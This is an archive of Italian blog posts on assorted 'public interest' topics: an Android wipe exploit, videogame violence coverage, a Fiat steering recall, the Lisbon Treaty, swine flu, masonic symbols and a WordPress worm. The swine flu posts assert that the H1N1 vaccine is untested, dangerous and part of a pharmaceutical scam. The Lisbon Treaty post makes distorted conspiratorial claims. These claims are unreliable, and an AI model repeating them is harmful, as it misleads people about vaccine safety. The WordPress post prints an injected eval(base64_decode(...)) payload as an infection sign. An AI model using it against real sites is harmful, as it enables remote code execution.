Archivi tag: pubblica-utilità

Occhio al Wipe!

In questi giorni se ne è parlato molto, stream ingolfato, fanboy Apple finalmente che possono spalare letame dopo averne ricevuti dei vagoni, ma in nessun caso si è fatta chiarezza su cosa sia in effetti questo exploit, ancor più capire se si è potenzialmente a rischio, ancor più eventuali contromisure in attesa di release riparatrici. Si parla di Samsung e Galaxy S3 solo per l’alta diffusione, in realtà si può presentare con ogni dispositivo che non monta Android Jelly Bean. Occhio e date una letta qui!

Contro la disinformazione nei videogiochi

Mai aspettarsi grandi cose dal TG1 di Minzolini. In caduta libera negli ascolti oramai è a tutti gli effetti un TG pagliaccissimo, forse assimilabile al rotocalco quotidiano in stile Studio Aperto. Stiamo parlando di uno dei principali mezzi di approvvigionamento delle notizie nel nostro paese. Allargando l’angolo di visuale, la strage in Norvegia riporta in auge un argomento molto caro ai giornalisti italiani, ovvero la correlazione tra violenza e videogames, se non addirittura il movente. Abbastanza inverosimile, i pazzi sciroccati sono sempre dietro l’angolo ma ciò è un pretesto usato abbastanza abitualmente per far leva su un pubblico ignorante sull’argomento. Antonio Fucito di Multiplayer.it (in arte TanZen) ha scritto un manifesto nel quale si cercherà di contenere, denunciare e informare.

Riporto solo un passaggio:

Il discorso è molto più semplice: se dessimo alle passioni o all’ideologia di Breivik un peso identico, allora dovremmo pensare che anche il suo essere un cattolico lo abbia spinto al massacro. Dichiariamo guerra al Vaticano? E vogliamo parlare della musica classica? Hitler era un grande appassionato di musica classica e di pittura figurativa, eppure non mi sembra che dopo la Seconda Guerra Mondiale qualcuno abbia chiesto di mettere sotto chiave la Gioconda o abbia vietato Wagner. Anche Breivik è un appassionato di musica classica, ma in coscienza vogliamo e possiamo dare alla bellezza della musica la colpa di un massacro?

Ah cosa c’entra il TG1? Beh il servizio andato in onda, piuttosto imbarazzante. Troverete il link nella pagina del manifesto.

Petizione sito non raggiungibile

Immaginate che un giorno intere sezioni della vostra biblioteca vengano rese inaccessibili. Non vi verrà mai detto quali specifici libri, e per quale ragione sono stati rimossi, ma troverete solo un cartello che vi informa che qualcuno, da qualche parte, per qualche ragione, ha segnalato che i libri di quella sezione violano i diritti di qualcun’altro. Immaginate che anche dagli scaffali accessibili della biblioteca qualcuno rimuova costantemente libri senza che voi o gli altri altri utenti della biblioteca, possiate sapere quali volumi sono stati rimossi, e senza che vi sia data la possibilità di valutare se la rimozione di tali libri viola alcuni dei vostri diritti fondamentali.

La rete è libera e controllarne l’informazione rimane il sogno di molti potenti che non possono più “perculare” la massa e fare continuamente i propri comodi. Siete sicuri di vivere in una democrazia? Occhio!

Allora leggete di cosa si tratta cliccando qui e diffondete!

Grande Punto a rischio!

Compra Fiat, compra Italiano. Con riserva. Casomai se avete qualche amico/a con una Grande Punto, Grande Punto Abarth prodotta tra il 2008 e il 2009 (precisamente numero di matricola 24267 al 412774, dal numero 1112419 al 1392261) avrà potenzialmente questo “leggerissimo” difetto: «Il prodotto presenta rischi di danni perché un possibile scorretto avvitamento detta vite superiore che fissa il piantone dello sterzo, potrebbe causare la rottura dello sterzo con conseguente perdita di controllo del volante, che a su volta potrebbe causare un incidente». Sono circa 500.000 vetture, avvisateli subito! La riparazione sarà a carico FIAT.

Fonte: L’Espresso.

Se non si fa, si fa per forza.

Ieri era la Costituzione Europea, più volte bocciata (a esempio Olanda e Francia nel 2005). Oggi si chiama Trattato di Lisbona, la sostanza non cambia. Inquietante notare come gli organi di informazione non ne hanno parlato più di tanto.

In sintesi:

-Aumenteranno i poteri straordinari della Commissione dell’Unione Europea in quasi tutti gli aspetti della vita dei cittadini (politica economica e difesa), privando il nostro Paese della propria sovranità e vanificando in questo senso la Costituzione italiana, a partire dall’Articolo 1 che recita “la sovranità appartiene al popolo”.

-La politica di difesa del Trattato prevede, oltre alle missioni di pace, anche missioni offensive, che violano l’Art. 11 della Costituzione. Attraverso il potenziamento delle forze militari messe a disposizione dell’Unione Europea, è in atto un tentativo di fare dell’Europa un braccio della NATO. Con la creazione di un gruppo ristretto di paesi a cui verrebbero demandate le iniziative militari, sarebbe più facile aggirare l’opposizione di chi vorrebbe evitare lo scontro strategico portato avanti da Londra e Washington nei confronti di Russia e Cina[6].

-In politica economica si parla di una vera e propria “dittatura dell’Unione e della Banca Centrale Europea”. Grazie al Trattato di Lisbona, infatti, i burocrati dell’Unione Europea avranno pieno titolo a bocciare qualunque misura decisa dal nostro governo, e dagli altri governi europei, per difendere la propria economia, l’occupazione, i redditi, l’industria e l’agricoltura, ed intervenire sui prezzi.

Ricapitoliamo per avere una idea della portata di questo Cavallo di Troia ad esempio qui in Italia la nostra Costituzione viene così violata:

Art. 1 (La sovranità appartiene al popolo, che la esercita nelle forme e nei limiti della Costituzione),
Art. 3 (Tutti i cittadini hanno pari dignità sociale e sono eguali davanti alla legge, senza distinzione di sesso, di razza, di lingua, di religione, di opinioni politiche, di condizioni personali e sociali.),
Art. 11 I° comma (L’Italia ripudia la guerra come strumento di offesa alla libertà degli altri popoli e come mezzo di risoluzione delle controversie internazionali) e II° comma (consente, in condizioni di parità con gli altri Stati, alle limitazioni di sovranità necessarie ad un ordinamento che assicuri la pace e la giustizia fra le Nazioni -solo pace e giustizia-),
Art. 27 (Non è ammessa la pena di morte).
Art. 101 (I giudici sono soggetti soltanto alla legge).

Si può capire come vita morte e miracoli di noi cittadini europei (500 milioni) sono in mano a un manipolo di potenti che letteralmente potranno fare quel cazzo che gli pare, soprattutto in materia economica e politica, sostituisce i precedenti trattati e afferma definitivamente la prevalenza del diritto comunitario su quello nazionale. In particolare l’articolo 2 ha creato parecchio (se così possiamo dire) scalpore: “La pena di morte è abolita, eccetto che in caso di guerra, di disordini, di insurrezione”. Passi per la guerra, ma chi deciderà quali sono i “disordini” e le “proteste popolari”? E’ qui il punto. Siamo in mano a delle persone che decidono il nostro destino con il dovuto rispetto della democrazia che in Europa prima o poi sarà destinata a finire nel cesso.

Applausi!

(fonte Disinformazione.it)

Siamo nei guai fino al collo.

Siamo fottuti. Dico seriamente. L’OMS è stata molto chiara, se la suina si combina con l’aviaria, succede un casino fotonico. Bleah, non oso immaginare che razza di incrocio venga fuori… In realtà il casino stà avvenendo alle casse dello Stato, le camionate di vaccino bluff, non testato e comunque pericoloso (leggete qui per sapere che effetto fa ll’audiuvante usato sui topi). Per questo i dottori fortunatamente lo boicottano, soprattutto per salvaguardare la salute dei bambini: è come mettere una bomba incontrollata in un sistema immunitario che si forma. Lo fotti per gli anni a venire e lo prepari a patologie ben più gravi. Pure i cinesi lo evitano. Quindi il terrore psicologico dei media (opportunatamente pilotato) cerca di correre ai ripari, se seguite quotidianamente il caso le notizie prontamente aggiornate oramai erano già finite nascoste nei trafiletti che nessuno legge mai. Ad oggi con le morti in Italia (sempre derivate da patologie gravi già esistenti) sono perfettamente in linea se rapportato al numero di malati. Lo Stato in questo momento suda freddo: il vaccino non lo fa nessuno, qualcuno deve essere comunque pagato (e si fumano pure le lievi speranza di guadagnarci qualcosa).

Arrivato il freddo polare.

L’avevano previsto, adesso è qui. In men che non si dica l’autunno è durato… Qualche giorno, ma fino alla settimana scorsa si andava in giro ancora con le maniche corte… Incredibile, l’autunno graduale come una volta oramai non esiste più. Beh, dicevo il freddone è arrivato, a tal punto di dover accendere il riscaldamento, almeno un minimo. Mica male. Un saluto alle zanzare, che siate maledette fino alla fine dei tempi, mai state fastidiose come quest’anno. Mi sto attrezzando per il prossimo turno estivo: se non disinfesta il comune, ci penso io.

Influenza Suina. Alcune cifre.

Popolazione Mondiale: quasi 7 miliardi di persone.
L’influenza normale uccide circa 500.000 persone all’anno.
La suina ad oggi ha prodotto circa 3000 morti ma dicono sottostimato, in realtà ricordo che quella normale ne ammazza 500.000 all’anno e comunque visto il naturale decorso non ha sintomi gravi, oramai perdono più tempo a contare che lasciare guarire.
Big Pharma è la produttrice del Tamiflu, farmaco antivirale, per accordi venderà 160 milioni di dosi solo in America, milioni di dosi in ogni stato EU. Ogni confezione costa 36,80€.
Per dirne una Enrica Giorgetti, moglie dell’attuale Ministro del Welfare Maurizio Sacconi, è Direttore Generale di Farmindustria. Il vice ministro Fazio ha firmato l’ordinanza contenente le “Misure urgenti in materia di profilassi vaccinale dell`Influenza pandemica A/H1N1”. Tra bambini, anziani, donne in gravidanza e persone in settori chiave in base alla categoria di lavoro in Italia verrà coperto il 40% della popolazione.

La psicosi della Suina in realtà non ha senso di esistere. Le loppy farmaceutiche in combutta con i governi dei vari paesi stanno creando una vera e propria truffa che dopo l’aviaria dei polli, la polmonite dello zibetto, S.A.R.S, antrace e cazzi vari, a malapena qualcuno denuncia. Ad oggi la suina in Italia ha fatto un morto e comunque sempre per colpa di un quadro clinico già compromesso. In Italia ci sono poco più di 2000 casi accertati. Ricordo che siamo quasi 60 milioni. Pensateci prima di farvi sparare il vaccino nel braccio. Una procedura simile nell’uso di un vaccino avvenne guardacaso nel 1976:

•Più persone morirono per il vaccino che per l’influenza.
•Furono rilevati 500 casi di sindrome di Guillain-Barré.
•Il vaccino potrebbe aver aumentato il rischio di contrarre la sindrome di Guillain-Barré di circa otto volte.
•Il vaccino venne ritirato dopo sole sei settimane quando la connessione con la sindorme di Guillain-Barré divenne chiara.
•Il governo statunitense venne costretto a ripagare milioni di dollari alle persone ammalatesi (Mail on Sunday, 16 Agosto 2009).

La storia della pandemia che non esiste continua a ripetersi.

(EDIT: i morti accertati in Italia sono due)

Simbolismo massonico.

Oggi vita di Bordo presenta i grandi reportage del nuovo millennio, ovvero l’incidenza massonica nella società. Siamo dentro una cospirazione massonica su un multistrato di livelli inimmaginabile. Forse non lo sapete ma il vostro capo non solo potrebbe fottervi la fidanzata, ma fotte pure voi perchè è un massone, e ride e si ingrassa alle vostre spalle. Eggià. Accettatelo o trovate un sistema per iniziarvi ed entrare così in una loggia. Ecco quindi alcuni simboli che ogni giorno danno dei segnali chiarissimi sulla massoneria, cominciate a guardarvi intorno e ve ne accorgerete… In ordine: il più classico ed usato, la moneta da un dollaro americana, ill logo della Playstation, quello della 360, il progetto Dharma, l’acqua che beve Bonimba, l’Alfa Romeo, L’ordine dei Tagliapietre dei Simpson, e gli ultimi due non necessitano di presentazioni…

Falla di WordPress…

Probabilmente chi si tiene informato sui siti specializzati (tipo punto-informatico) ne era già a conoscenza, gli altri che usano WordPress e non lo hanno ancora aggiornato alla recente 2.8.4, gli conviene farlo alla svelta ma potrebbe essere troppo tardi. Io l’ho già fatto la settimana scorsa, oggi ho tempo e voglia per avvisarvi su queste pagine. Si sa che una piattaforma diffusa (oltre 5 milioni di blog) con il passare del tempo viene sempre presa di mira da spammer e lameroni del cazzo, che cercano in ogni modo di bucarvi il sito. Orbene questo è un vero e proprio worm che si sta diffondendo rapidamente a partire dallo scorso agosto, elude il codice (utilizzando la solita falla di cui nessuno era a conoscenza), si crea un utente con i privilegi di admin restando nascosto e vi inonda il blog di spazzatura. Come fare a sapere se siete stati infettati? Due modi, il primo se trovate alla fine dei vostri permalink (in pratica cliccate su un vostro post) una stringa di codice anomala, ad esempio http://www.sito.com/2009/09/05/titolo-post/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/, contenente il termine eval e/o il termine base64_decode oppure date un’occhiata agli Amministratori del vostro sito, nel pannello utenti se ne trovate come “Amministratore (2)” anzichè (1), siete fritti. In effetti non esiste cura o fix appropriato, siete costretti ad esportare tutti i contenuti con l’apposito tool di wordpress, segarlo completamente (inutile backuppare il database perchè corrotto) e reimportare il blog. Quindi se per caso non lo avete, correte immediatamente ad aggiornare la piattaforma oppure se riuscite utilizzate l’apposito update integrato!